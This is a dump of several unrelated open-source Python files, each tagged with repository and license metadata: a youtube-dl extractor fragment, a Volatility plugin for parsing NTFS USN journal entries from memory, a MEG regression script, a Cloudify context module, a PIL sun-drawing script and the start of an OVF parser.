'width': fmt['res_width'],
'height': fmt['res_lines'],
'abr': fmt['audiobitrate'],
'vbr': fmt['videobitrate'],
'filesize': fmt['filesize'],
'format_note': fmt['quality_name'],
'preference': fmt['priority'],
})
self._sort_formats(formats)
show = self._download_json(
'https://api.noco.tv/1.0/shows/show/%s' % video_id, video_id, 'Downloading show JSON')[0]
upload_date = unified_strdate(show['indexed'])
uploader = show['partner_name']
uploader_id = show['partner_key']
duration = show['duration_ms'] / 1000.0
thumbnail = show['screenshot']
episode = show.get('show_TT') or show.get('show_OT')
family = show.get('family_TT') or show.get('family_OT')
episode_number = show.get('episode_number')
title = ''
if family:
title += family
if episode_number:
title += ' #' + compat_str(episode_number)
if episode:
title += ' - ' + episode
description = show.get('show_resume') or show.get('family_resume')
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'upload_date': upload_date,
'uploader': uploader,
'uploader_id': uploader_id,
'duration': duration,
'formats': formats,
}
|
huangciyin/youtube-dl
|
youtube_dl/extractor/noco.py
|
Python
|
unlicense
| 3,451
|
#
# This plugin is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License Version 2 as
# published by the Free Software Foundation. You may not use, modify or
# distribute this program under any other version of the GNU General
# Public License.
#
# This plugin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Csaba Barta
@license: GNU General Public License 2.0
@contact: csaba.barta@gmail.com
"""
# Information for this script taken from the following blog-post by Sebastian Nerz
# http://www.propheciesintothepast.name/2014/03/10/usnjrnlj/
import volatility.plugins.common as common
import volatility.scan as scan
import volatility.utils as utils
import volatility.addrspace as addrspace
import volatility.obj as obj
import struct
import binascii
import re
import volatility.constants
import csv
import sys
REASONSCODES = {
0x00000001: 'Data in one or more named data streams for the file was overwritten.',
0x00000002: 'The file or directory was added to.',
0x00000004: 'The file or directory was truncated.',
0x00000010: 'Data in one or more named data streams for the file was overwritten.',
0x00000020: 'One or more named data streams for the file were added to.',
0x00000040: 'One or more named data streams for the file was truncated.',
0x00000100: 'The file or directory was created for the first time.',
0x00000200: 'The file or directory was deleted.',
0x00000400: "The user made a change to the file's or directory's extended attributes. These NTFS attributes are not accessible to Windows-based applications.",
0x00000800: 'A change was made in the access rights to the file or directory.',
0x00001000: 'The file or directory was renamed, and the file name in this structure is the previous name.',
0x00002000: 'The file or directory was renamed, and the file name in this structure is the new name.',
0x00004000: 'A user changed the FILE_ATTRIBUTE_NOT_CONTENT_INDEXED attribute. That is, the user changed the file or directory from one that can be content indexed to one that cannot, or vice versa.',
0x00008000: 'A user has either changed one or more file or directory attributes or one or more time stamps.',
0x00010000: 'An NTFS hard link was added to or removed from the file or directory',
0x00020000: 'The compression state of the file or directory was changed from or to compressed.',
0x00040000: 'The file or directory was encrypted or decrypted.',
0x00080000: 'The object identifier of the file or directory was changed.',
0x00100000: 'The reparse point contained in the file or directory was changed, or a reparse point was added to or deleted from the file or directory.',
0x00200000: 'A named stream has been added to or removed from the file, or a named stream has been renamed.',
0x80000000: 'The file or directory was closed.',
}
SOURCES = {
0x00000002 : 'USN_SOURCE_AUXILIARY_DATA',
0x00000001 : 'USN_SOURCE_DATA_MANAGEMENT',
0x00000004 : 'USN_SOURCE_REPLICATION_MANAGEMENT'
}
ATTRIBUTES = {
1:'FILE_ATTRIBUTE_READONLY',
2:'FILE_ATTRIBUTE_HIDDEN',
4:'FILE_ATTRIBUTE_SYSTEM',
16:'FILE_ATTRIBUTE_DIRECTORY',
32:'FILE_ATTRIBUTE_ARCHIVE',
64:'FILE_ATTRIBUTE_DEVICE',
128:'FILE_ATTRIBUTE_NORMAL',
256:'FILE_ATTRIBUTE_TEMPORARY',
512:'FILE_ATTRIBUTE_SPARSE_FILE',
1024:'FILE_ATTRIBUTE_REPARSE_POINT',
2048:'FILE_ATTRIBUTE_COMPRESSED',
4096:'FILE_ATTRIBUTE_OFFLINE',
8192:'FILE_ATTRIBUTE_NOT_CONTENT_INDEXED',
16384:'FILE_ATTRIBUTE_ENCRYPTED',
65536:'FILE_ATTRIBUTE_VIRTUAL'
}
USN_RECORDS = {
'FILE_REFERENCE': [ None, {
'RecordNumberLow' : [0x00, ['unsigned long']],
'RecordNumberHigh': [0x04, ['unsigned short']],
'SequenceNumber' : [0x06, ['unsigned short']]
}],
'USN_RECORD_V2': [ None, {
'RecordLength': [0x00, ['unsigned int']],
'MajorVersion': [0x04, ['unsigned short']],
'MinorVersion': [0x06, ['unsigned short']],
'FileReferenceNumber': [0x08, ['FILE_REFERENCE']],
'ParentFileReferenceNumber': [0x10, ['FILE_REFERENCE']],
'USN': [0x18, ['unsigned long long']],
'TimeStamp': [0x20, ['WinTimeStamp', dict(is_utc = True)]],
'ReasonCode': [0x28, ['unsigned int']],
'SourceInfo': [0x2B, ['unsigned int']],
'SecurityId': [0x30, ['unsigned int']],
'FileAttributes': [0x34, ['unsigned int']],
'FileNameLength': [0x38, ['unsigned short']],
'FileNameOffset': [0x3A, ['unsigned short']],
'FileName': [0x3C, ['String', dict(encoding='utf16', length = lambda x: x.FileNameLength)]]
}]
}
class FILE_REFERENCE(obj.CType):
@property
def RecordNumber(self):
high = self.RecordNumberHigh << 32
return self.RecordNumberLow | high
class USN_RECORD_V2(obj.CType):
Attributes = []
AttributeList = u""
def __init__(self, theType, offset, vm, name = None, members = None, struct_size = 0, **kwargs):
obj.CType.__init__(self, theType, offset, vm, name, members, struct_size, **kwargs)
@property
def Reasons(self):
# Init reasons
reasons = []
try:
reasonkeys = REASONSCODES.keys()
for k in reasonkeys:
if k & self.ReasonCode == k:
reasons.append(k)
except Exception as i:
pass
return reasons
@property
def ReasonList(self):
# Init reason list
reasonList = u""
try:
for k in self.Reasons:
if len(reasonList) > 0:
reasonList = reasonList + " " + REASONSCODES[k]
else:
reasonList = REASONSCODES[k]
except Exception as i:
pass
return reasonList
@property
def Attributes(self):
# Init attributes
attributes = []
try:
attrkeys = ATTRIBUTES.keys()
for k in attrkeys:
if k & self.FileAttributes == k:
attributes.append(k)
except:
pass
return attributes
@property
def AttributeList(self):
# Init attribute list
attributeList = u""
try:
for k in self.Attributes:
if len(attributeList) > 0:
attributeList = attributeList + " " + ATTRIBUTES[k]
else:
attributeList = ATTRIBUTES[k]
except Exception as i:
pass
return attributeList
@property
def isValid(self):
if self.FileNameLength > 0 and \
self.FileNameLength < 512 and \
self.RecordLength < (0x3C + self.FileNameLength + 100):
return True
else:
return False
def __str__(self):
if self.isValid:
return "{0}\t{1}\t{2}\t{3}\t{4}\t{5}".format(
str(self.TimeStamp),
str(self.FileReferenceNumber.RecordNumber),
str(self.ParentFileReferenceNumber.RecordNumber),
str(self.USN),
str(self.FileName.v().decode('utf-16')),
str(self.ReasonList))
else:
print "Corrupt entry"
return ""
def csv(self, offset):
if self.isValid:
return [self.TimeStamp,
self.FileReferenceNumber.RecordNumber,
self.ParentFileReferenceNumber.RecordNumber,
self.USN,
self.FileName.v().decode('utf-16').encode('utf-8'),
self.FileAttributes,
self.AttributeList,
self.ReasonCode,
self.ReasonList]
else:
return None
def body(self, offset):
#
# This output is only experimental
#
if not self.isValid:
return ""
AccessTime = 0
ModifiedTime = 0
MFTAlteredTime = 0
CreationTime = 0
for r in self.Reasons:
if r in [0x01,0x02,0x04,0x10,0x20, 0x40,
0x0100, 0x0200, 0x400,
0x800, 0x4000, 0x8000, 0x10000,
0x100000, 0x200000, 0x80000000]:
ModifiedTime = self.TimeStamp.v()
if r in [0x100, 0x200, 0x1000, 0x2000]:
MFTAlteredTime = self.TimeStamp.v()
if r in [0x100, 0x200]:
CreationTime = self.TimeStamp.v()
AccessTime = self.TimeStamp.v()
return "0|{0} (Offset: 0x{1:x})|{2}||0|0|0|{3}|{4}|{5}|{6}".format(
self.FileName.v().decode('utf-16').encode('utf-8'),
offset,
self.FileReferenceNumber.RecordNumber,
AccessTime,
ModifiedTime,
MFTAlteredTime,
CreationTime)
class USN_RECORD(obj.ProfileModification):
before = ['WindowsObjectClasses']
conditions = {'os': lambda x: x == 'windows'}
def modification(self, profile):
profile.object_classes.update({
'USN_RECORD_V2' : USN_RECORD_V2,
'FILE_REFERENCE': FILE_REFERENCE,
})
profile.vtypes.update(USN_RECORDS)
class USNScanner(scan.BaseScanner):
checks = [ ]
overlap = 0x3c
def __init__(self, needles = None):
self.needles = needles
self.checks = [ ("RegExCheck", {'needles':needles})]
scan.BaseScanner.__init__(self)
def scan(self, address_space, offset = 0, maxlen = None):
for offset in scan.BaseScanner.scan(self, address_space, offset, maxlen):
yield offset
class RegExCheck(scan.ScannerCheck):
""" Checks for multiple strings per page """
regexs = []
def __init__(self, address_space, needles = None):
scan.ScannerCheck.__init__(self, address_space)
if not needles:
needles = []
self.needles = needles
self.maxlen = 0x3c
for needle in needles:
r = re.compile(needle)
self.regexs.append(re.compile(needle))
if not self.maxlen:
raise RuntimeError("No needles of any length were found for the " + self.__class__.__name__)
def check(self, offset):
usn_buff = self.address_space.read(offset, 0x3c + 256)
for regex in self.regexs:
if regex.match(usn_buff) != None:
return True
return False
def skip(self, data, offset):
for regex in self.regexs:
ue = regex.search(data)
if ue == None:
return len(data) - offset
else:
return ue.start()
class USNJRNL(common.AbstractWindowsCommand):
""" Scans for and parses potential USNJRNL entries """
def __init__(self, config, *args, **kwargs):
common.AbstractWindowsCommand.__init__(self, config, *args, **kwargs)
def calculate(self):
address_space = utils.load_as(self._config, astype = 'physical')
scanner = USNScanner(needles = ['.{2}\x00\x00\x02\x00\x00\x00.{31}\x01.{17}[\x00\x01]\x3C\x00'])
usn_entries = []
#print "Scanning for USNJRNL entries"
for offset in scanner.scan(address_space):
usn_buff = address_space.zread(offset, 0x3c + 1024)
bufferas = addrspace.BufferAddressSpace(self._config, data = usn_buff)
usn_entry = obj.Object('USN_RECORD_V2', vm = bufferas,
offset = 0)
if usn_entry.isValid:
yield offset, usn_entry
def render_text(self, outfd, data):
for offset, usn_entry in data:
#print "Offset: " + str(offset)
print str(usn_entry)
#print "*" * 80
def render_body(self, outfd, data):
print "This output method is only experimental"
for offset, usn_entry in data:
print usn_entry.body(offset)
def render_csv(self, outfd, data):
w = csv.writer(sys.stdout, dialect='excel', quoting=csv.QUOTE_ALL)
w.writerow(["TimeStamp", "MFT", "Parent MFT", "USN", "FileName", "Attributes", "AttributeList", "ReasonCode", "ReasonList"])
for offset, usn_entry in data:
ue = usn_entry.csv(offset)
if ue != None:
w.writerow(ue)
|
csababarta/volatility_plugins
|
usnjrnl.py
|
Python
|
gpl-2.0
| 12,715
|
import scipy
import pickle
import numpy
import sklearn.linear_model
import matplotlib #needed to avoid having to run an X-server just to output to a png
matplotlib.use('Agg') #needed to avoid having to run an X-server just to output to a png
import pylab
import re
def adjustR2(R2, numFeatures, numSamples):
#1/0
#return R2
return R2-(1-R2)*(float(numFeatures)/(numSamples-numFeatures-1))
def mynormalise(A):
A = scipy.stats.zscore(A)
A[numpy.isnan(A)] = 0
return A
wordPropsFile = '/home/corpora/original/english/meg_hod_corpus/projects/heartOfDarkness/wordTimesAnnots/hod_JoeTimes_LoadsaFeaturesV3.tab' # best yet! have automatic Stanford tagging, several word length and freq measures, and also the 2 and 3 token back-grams
wordProps = scipy.genfromtxt(wordPropsFile,delimiter='\t',names=True,dtype="i4,f4,f4,S50,S50,i2,i2,i2,S10,f4,f4,f4,f4,f4,f4,f4,f4,f4,f4,f4")
epochedGroupMeanAreasensorsMeanSensors = pickle.load(open('/home/corpora/original/english/meg_hod_corpus/usr/data/meg/heartOfDarkness/meanPartsMeanChannelsLeftTempPNPgradsUPMC4_TSSS_0.1-8Hz_@125.pkl'))
#dimensions of original input file: (14595 epochs, 375 channels)
#epochedGroupMeanAreasensorsMeanSensors = pickle.load(open('/usr1/meg/audioBookHofD/groupedDatasets/meanPartsMeanChannelsLeftTempPNPgradsUPMC4_TSSS_0.1-8Hz_@125.pkl'))
#epochedGroupMeanAreasensorsMeanSensors = pickle.load(open('/usr1/meg/audioBookHofD/groupedDatasets/meanPartsMeanChannelsLeftTempNPNgradsUPMC4_TSSS_0.1-8Hz_@125.pkl'))
#epochedGroupMeanAreasensorsMeanSensors = pickle.load(open('/usr1/meg/audioBookHofD/groupedDatasets/meanPartsMeanChannelsLeftAntTempMagsUPMC4_TSSS_0.1-8Hz_@125.pkl'))
#epochedGroupMeanAreasensorsMeanSensors = pickle.load(open('/usr1/meg/audioBookHofD/groupedDatasets/meanPartsMeanLeftTempMagsGradsUPMC4_TSSS_0.1-8Hz_@125.pkl'))
wordTrials = numpy.array([p != '' for p in wordProps['stanfPOS']])
#epochTimeSelection = range(750) #range(125,625) # -0.5 to +1.5s
epochStart = -1; # 1s before onset
epochEnd = 2; # 2s after onset
samplingRate = 125
epochSamples = epochedGroupMeanAreasensorsMeanSensors.shape[1]
epochLength = epochEnd-epochStart;
zeroSample = (abs(epochStart)/float(epochLength)*epochSamples)
wordEpochs = epochedGroupMeanAreasensorsMeanSensors[wordTrials]
wordFeatures = wordProps[wordTrials]
# TEMP, make task smaller
wordEpochs = wordEpochs[:]
#wordFeatures =
#wordFeatures[:100]['surprisal2back_COCA']
#regParam = [0.001,0.01, 0.1, 1, 10, 1e+2, 1e+3]
regParam = [0.001, 0.002, 0.005, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 1e+2, 2e+2, 5e+2, 1e+3, 2e+3, 5e+3]
#epochHistory=0
features = [
# 'random',
# 'track',
# 'sentenceSerial', # will be perfectly correlated with one from previous epoch; see below, first one gets re-introduced
# 'runSerial',
# 'storySerial', # is linear combination of track and runserial
# 'stanfPOS',
# 'duration',
# 'lenLett',
# 'lenPhonCMU',
# 'lenSyllCMU',
'logFreq_ANC',
# 'tokenPrimed',
# 'tokenPosPrimed',
'surprisal2back_COCA',
# 'bigramLogProbBack_COCA',
# 'trigramLogProbBack_COCA',
# 'bigramEntropy_COCA_previous', # will be perfectly correlated with one from previous epoch;
'bigramEntropy_COCA_here',
]
labelMap = {
'logFreq_ANC': 'freq',
'surprisal2back_COCA': 'surprisal',
'bigramEntropy_COCA_here': 'entropy',
'sentenceSerial': 'position',
}
legendLabels = features
explanatoryFeatures = numpy.zeros((wordFeatures.shape)) # dummy
#explanatoryFeatures = numpy.array([])
for feature in features:
if feature == 'duration':
explanatoryFeatures = numpy.vstack((explanatoryFeatures, wordFeatures['offTime']-wordFeatures['onTime']))
elif feature == 'random':
explanatoryFeatures = numpy.vstack((explanatoryFeatures, numpy.random.random((wordFeatures.shape))))
else:
explanatoryFeatures = numpy.vstack((explanatoryFeatures, wordFeatures[feature]))
#print '\tlearning semantic dimension',dim,'non-zeros, sum',len(trainY)-sum(trainY==0),sum(trainY), time.ctime()
#explanatoryFeatures[-1,:] = (explanatoryFeatures[-1,:] - numpy.mean(explanatoryFeatures[-1,:]))/numpy.std(explanatoryFeatures[-1,:])
explanatoryFeatures = explanatoryFeatures[1:].T # strip zeros out again
#explanatoryFeatures = explanatoryFeatures.T # strip zeros out again
#features.insert(0,'dummyConstant')
def commonPlotProps():
#pylab.plot((0,epochSamples),(0,0),'k--')
#pylab.ylim((-2.5e-13,2.5e-13)) #((-5e-14,5e-14)) # better way just to get the ones it choose itself?
#pylab.plot((zeroSample,zeroSample),(0,0.01),'k--')
pylab.xticks(numpy.linspace(0,epochSamples,7),epochStart+(numpy.linspace(0,epochSamples,7)/samplingRate))
pylab.xlabel('time (s) relative to auditory onset') #+refEvent)
pylab.xlim((62,313))
pylab.show()
pylab.axhline(0, color='k', linestyle='--')
pylab.axvline(125, color='k', linestyle='--')
#if epochsBack > 0:
# historyFeatures = numpy.zeros((explanatoryFeatures.shape[0], explanatoryFeatures.shape[1]*(epochsBack+1)))
for epochHistory in [3]: #range(10):
modelTrainingFit = []
modelTestCorrelation = []
modelParameters = []
legendLabels = features
tmpFeatures = explanatoryFeatures.copy()
tmpLegend = legendLabels[:]
for epochsBack in range(1,epochHistory+1):
epochFeatures = numpy.zeros(tmpFeatures.shape)
epochFeatures[epochsBack:,:] = tmpFeatures[:-epochsBack,:]
explanatoryFeatures = numpy.hstack((explanatoryFeatures,epochFeatures))
legendLabels = legendLabels + [l+'-'+str(epochsBack) for l in tmpLegend]
# put in sentence serial - can't leave in history, cos is too highly correlated...
explanatoryFeatures = numpy.vstack((explanatoryFeatures.T, wordFeatures['sentenceSerial'])).T
features.append('sentenceSerial')
legendLabels.append('sentenceSerial')
#explanatoryFeatures = mynormalise(explanatoryFeatures)
#pylab.figure(); pylab.imshow(explanatoryFeatures,interpolation='nearest', aspect='auto'); pylab.show()
#1/0
for t in range(epochSamples):
#print 'fitting at timepoint',t
# NOTES # tried a load of different versions, and straight linear regression does as well as any of them, measured in terms of R^2
#lm = sklearn.linear_model.LinearRegression(fit_intercept=True, normalize=True)
#lm = sklearn.linear_model.RidgeCV(fit_intercept=True, normalize=True, alphas=regParam) #, 10000, 100000])
lm = sklearn.linear_model.LassoLars(alpha=0.0001) #(alpha=1.0, fit_intercept=True, verbose=False, normalize=True, precompute='auto', max_iter=500, eps=2.2204460492503131e-16, copy_X=True)
#lm = sklearn.linear_model.Ridge(fit_intercept=True, normalize=True)
#lm = sklearn.linear_model.RidgeCV(fit_intercept=True, normalize=True, alphas=[1000000000]) #, 10000, 100000]) # with one test, and 9 explanatory variables, found that got alpha down to .01 for the times when we have a big R^2
#lm = sklearn.linear_model.RidgeCV(fit_intercept=True, normalize=True, alphas=[1]) #, 10000, 100000])
#lm = sklearn.linear_model.RidgeCV(fit_intercept=True, normalize=True, alphas=[1e-6,1e-4,1e-2,1e+0,1e+2, 1e+4, 1e+6]) #, 10000, 100000])
#lm = sklearn.linear_model.ElasticNetCV(0.5) # rho (l1/l2 balance) parameter range suggested by doc pages
#lm = sklearn.linear_model.ElasticNetCV([.1, .5, .7, .9, .95, .99, 1]) # rho (l1/l2 balance) parameter range suggested by doc pages
# found that ended up taking rho of 1, and zero betas, so trying more L2 biased rho (documentation seems to be contradictory about l1/l2 aka lasso/ridge)
trainX = mynormalise(explanatoryFeatures)
trainY = mynormalise(wordEpochs[:,t])
#trainX = explanatoryFeatures
#trainY = wordEpochs[:,t]
trainedLM = lm.fit(trainX,trainY)
modelParameters.append(lm)
#guessY = lm.predict(testX)
#guessTestSemantics[:,dim] = guessY
modelTrainingFit.append(adjustR2(lm.score(trainX,trainY), trainX.shape[1], trainX.shape[0]))
#modelTestCorrelation.append(numpy.corrcoef(guessTestSemantics[:,dim],realTestSemantics[:,dim])[1,0])
#print '\t\tdone, explaining R^2 of',modelTrainingFit[-1],'reg param',trainedLM.alpha_,'betas',modelParameters[-1].coef_
#print '\t\tdone, explaining R^2 of',modelTrainingFit[-1],'betas',modelParameters[-1].coef_, lm.alpha_ #'chose reg param of',lm.best_alpha # lm.alphas_[0] # lm.best_alpha for ridge; lm.alphas_[0] for lassolars
#guessTestSemantics[testTrial,dim] = lm.predict(testX[testTrial,:])
betaMatrix = numpy.array([p.coef_ for p in modelParameters])
neatLabels = [l.replace(re.match(r'[^-]+',l).group(0), labelMap[re.match(r'[^-]+',l).group(0)]) for l in legendLabels if re.match(r'[^-]+',l).group(0) in labelMap]
legendLabels = numpy.array(legendLabels)
#numFeaturesDisplay = len(legendLabels)
neatLabels = numpy.array(neatLabels)
f = pylab.figure()
s = pylab.subplot(2,2,1)
pylab.title('R-squared '+str(trainedLM))
pylab.plot(modelTrainingFit, linewidth=2)
commonPlotProps()
s = pylab.subplot(2,2,2)
#pylab.plot(betaMatrix, '-', linewidth=2)
pylab.plot(betaMatrix[:,:7], '-', linewidth=2)
pylab.plot(betaMatrix[:,7:], '--', linewidth=2)
pylab.legend(neatLabels)
#pylab.legend(legendLabels)
pylab.title('betas for all (normed) variables')
commonPlotProps()
s = pylab.subplot(2,2,3)
pylab.title('correlations between explanatory variables')
pylab.imshow(numpy.abs(numpy.corrcoef(explanatoryFeatures.T)),interpolation='nearest', origin='upper') # leave out the dummy one
pylab.clim(0,1)
pylab.yticks(range(len(neatLabels)),neatLabels)
pylab.ylim((-0.5,len(neatLabels)-0.5))
pylab.xticks(range(len(neatLabels)),neatLabels, rotation=90)
pylab.xlim((-0.5,len(neatLabels)-0.5))
pylab.colorbar()
s = pylab.subplot(2,2,4)
pylab.plot(numpy.mean(epochedGroupMeanAreasensorsMeanSensors,axis=0), linewidth=2)
pylab.title('ERF')
commonPlotProps()
pylab.savefig('meg_testfig.png')
print 'history %d, mean model fit over -0.5s to +1.0s: %.5f, max is %.5f' % (epochHistory, numpy.mean(modelTrainingFit[62:250]), numpy.max(modelTrainingFit[62:250]))
#interestingFeatures = numpy.argsort(numpy.sum(numpy.abs(betaMatrix),axis=0))[::-1][:7]
#interestingBetas = betaMatrix[:,interestingFeatures]
#interestingLabels = legendLabels[interestingFeatures]
#interestingExpFeatures = explanatoryFeatures[:,interestingFeatures]
#f = pylab.figure()
#s = pylab.subplot(2,2,1)
#pylab.title('R-squared '+str(trainedLM))
#pylab.plot(modelTrainingFit)
#commonPlotProps()
#s = pylab.subplot(2,2,2)
#pylab.plot(interestingBetas)
#pylab.legend(interestingLabels)
#pylab.title('betas for %d most interesting normed variables' % len(interestingFeatures))
#commonPlotProps()
#s = pylab.subplot(2,2,3)
#pylab.title('correlations between explanatory variables')
#pylab.imshow(numpy.corrcoef(interestingExpFeatures.T),interpolation='nearest') # leave out the dummy one
#pylab.yticks(range(len(interestingLabels)-1),interestingLabels[1:])
#pylab.ylim((-0.5,len(interestingLabels)-1-0.5))
#pylab.xticks(range(len(interestingLabels)-1),interestingLabels[1:], rotation=90)
#pylab.xlim((-0.5,len(interestingLabels)-1-0.5))
#pylab.colorbar()
#s = pylab.subplot(2,2,4)
#pylab.plot(numpy.mean(epochedGroupMeanAreasensorsMeanSensors,axis=0))
#pylab.title('ERF')
#commonPlotProps()
|
vansky/meg_playground
|
scripts/tileRegressionSeeRSquared_EpochsBack.py
|
Python
|
gpl-2.0
| 11,071
|
########
# Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import threading
from proxy_tools import proxy
class CtxParameters(dict):
def __init__(self, parameters):
parameters = parameters or {}
super(CtxParameters, self).__init__(parameters)
def __getattr__(self, attr):
if attr in self:
return self.get(attr)
else:
raise KeyError(attr)
class CurrentContext(threading.local):
def set(self, ctx, parameters=None):
self.ctx = ctx
self.parameters = CtxParameters(parameters)
def get_ctx(self):
return self._get('ctx')
def get_parameters(self):
return self._get('parameters')
def _get(self, attribute):
if not hasattr(self, attribute):
raise RuntimeError('No context set in current execution thread')
result = getattr(self, attribute)
if result is None:
raise RuntimeError('No context set in current execution thread')
return result
def clear(self):
if hasattr(self, 'ctx'):
delattr(self, 'ctx')
if hasattr(self, 'parameters'):
delattr(self, 'parameters')
current_ctx = CurrentContext()
current_workflow_ctx = CurrentContext()
@proxy
def ctx():
return current_ctx.get_ctx()
@proxy
def ctx_parameters():
return current_ctx.get_parameters()
@proxy
def workflow_ctx():
return current_workflow_ctx.get_ctx()
@proxy
def workflow_parameters():
return current_workflow_ctx.get_parameters()
|
isaac-s/cloudify-plugins-common
|
cloudify/state.py
|
Python
|
apache-2.0
| 2,116
|
from random import random, randint
from PIL import Image, ImageDraw, ImageFont
import perlin
def draw_background(setup) :
canvas = setup['canvas']
image = Image.new('RGBA', canvas, tuple(setup['color']['back']))
background = Image.new('RGBA', canvas, (0,0,0,0))
draw = ImageDraw.Draw(background)
stars = [[ int(p * random()) for p in canvas ] for x in range(400) ]
scale = lambda x, r : x + r * (min(canvas) / 320)
color = (255, 255, 255, 100)
for x, y in stars :
r = random()
draw.ellipse([x, y, scale(x, r), scale(y, r)], fill=color)
return Image.alpha_composite(image, background)
def apply_noise(image, setup) :
generator = perlin.Perlin()
octaves = 5
persistence = 5
coef = 30
width, height = setup['canvas'][0], setup['canvas'][1]
list_of_pixels = list(image.getdata())
for i, pixel in enumerate(list_of_pixels) :
if pixel != (0, 0, 0, 0) :
noise = generator.OctavePerlin((i % width) / coef, i / (height * coef), 0, 1, 5)
new_pixel = [ int(x * (1 + noise)) for x in pixel[:3] ]
new_pixel.append(pixel[3])
list_of_pixels[i] = tuple(new_pixel)
image = Image.new(image.mode, image.size)
image.putdata(list_of_pixels)
return image
def apply_ray_effect(sun_image, setup) :
canvas = setup['canvas']
width, height = setup['canvas'][0], setup['canvas'][1]
decay = 0.8
density = 1.2
samples = 128
center = [ x / 2 for x in setup['canvas'] ]
list_of_pixels = list(sun_image.getdata())
new_image = []
print("starting postprocessing...")
for y in range(height) :
print("\rjob completed {0:.2f}%".format(round(100 * (y / height), 2)), flush=True, end="")
for x in range(width) :
tc = [x, y]
delta = [ (x - center[0]) / (samples * density), (y - center[1]) / (samples * density) ]
color = list_of_pixels[x + y * width]
illumination = 1
for m in range(samples) :
tc = [ tc[0] - delta[0], tc[1] - delta[1]]
add_color = tuple( illumination * x for x in list_of_pixels[int(tc[0]) + int(tc[1]) * width] )
illumination *= decay
color = tuple( x + y for x, y in zip(color, add_color))
new_image.append(tuple(int(x) for x in color))
image = Image.new(sun_image.mode, sun_image.size)
image.putdata(new_image)
return image
def draw_sun(image, setup) :
canvas = setup['canvas']
sun_image = Image.new('RGBA', canvas, (0,0,0,0))
draw = ImageDraw.Draw(sun_image)
draw.ellipse(setup['sun'], fill=tuple(setup['color']['base']))
sun_image = apply_noise(sun_image, setup)
sun_image = apply_ray_effect(sun_image, setup)
return Image.alpha_composite(image, sun_image)
def create_sun(setup) :
canvas, size = setup['canvas'], setup['size']
d = min([x * 0.08 * 5 * size for x in canvas])
planet = [ (x - d) / 2 for x in canvas ]
planet.append(planet[0] + d)
planet.append(planet[1] + d)
setup['sun'] = planet
setup['diam'] = d
setup['rad'] = d / 2
setup['center'] = [ planet[0] + d / 2, planet[1] + d / 2 ]
def sun_setup(setup) :
tmp_setup = {}
tmp_setup['color'] = {}
tmp_setup['color']['base'] = setup[2]
tmp_setup['color']['back'] = [ int(x * 0.05) for x in setup[2] ]
tmp_setup['canvas'] = [ x * 2 for x in setup[0] ]
tmp_setup['size'] = setup[1] / (255 * 2)
return tmp_setup
def sun(setup) :
setup = sun_setup(setup)
create_sun(setup)
image = draw_background(setup)
image = draw_sun(image, setup)
canvas = [ int(x / 2) for x in setup['canvas'] ]
resized = image.resize(canvas, Image.ANTIALIAS)
resized.save("test.png")
setup = ((1200, 750), 128, (180, 120, 100))
sun(setup)
|
vojtatom/planets
|
sun.py
|
Python
|
gpl-3.0
| 3,499
|
#
# Copyright 2009 Red Hat, Inc.
# Cole Robinson <crobinso@redhat.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301 USA.
#
import libxml2
import virtconv.formats as formats
import virtconv.vmcfg as vmcfg
import virtconv.diskcfg as diskcfg
import virtconv.netdevcfg as netdevcfg
import logging
# Mapping of ResourceType value to device type
# http://konkretcmpi.org/cim218/CIM_ResourceAllocationSettingData.html
#
# "Other" [1]
# "Computer System" [2]
# "Processor" [3]
# "Memory" [4]
# "IDE Controller" [5]
# "Parallel SCSI HBA" [6]
# "FC HBA" [7]
# "iSCSI HBA" [8]
# "IB HCA" [9]
# "Ethernet Adapter" [10]
# "Other Network Adapter" [11]
# "I/O Slot" [12]
# "I/O Device" [13]
# "Floppy Drive" [14]
# "CD Drive" [15]
# "DVD drive" [16]
# "Disk Drive" [17]
# "Tape Drive" [18]
# "Storage Extent" [19]
# "Other storage device" [20]
# "Serial port" [21]
# "Parallel port" [22]
# "USB Controller" [23]
# "Graphics controller" [24]
# "IEEE 1394 Controller" [25]
# "Partitionable Unit" [26]
# "Base Partitionable Unit" [27]
# "Power" [28]
# "Cooling Capacity" [29]
# "Ethernet Switch Port" [30]
DEVICE_CPU = "3"
DEVICE_MEMORY = "4"
DEVICE_IDE_BUS = "5"
DEVICE_SCSI_BUS = "6"
DEVICE_ETHERNET = "10"
DEVICE_DISK = "17"
DEVICE_GRAPHICS = "24"
# AllocationUnits mapping can be found in Appendix C here:
# http://www.dmtf.org/standards/documents/CIM/DSP0004.pdf
def register_namespace(ctx):
ctx.xpathRegisterNs("ovf", "http://schemas.dmtf.org/ovf/envelope/1")
ctx.xpathRegisterNs("ovfenv", "http://schemas.dmtf.org/ovf/environment/1")
ctx.xpathRegisterNs("rasd", "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData")
ctx.xpathRegisterNs("vssd", "http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData")
ctx.xpathRegisterNs("vmw", "http://www.vmware.com/schema/ovf")
def node_list(node):
child_list = []
child = node.children
while child:
child_list.append(child)
child = child.next
return child_list
def get_child_content(parent_node, child_name):
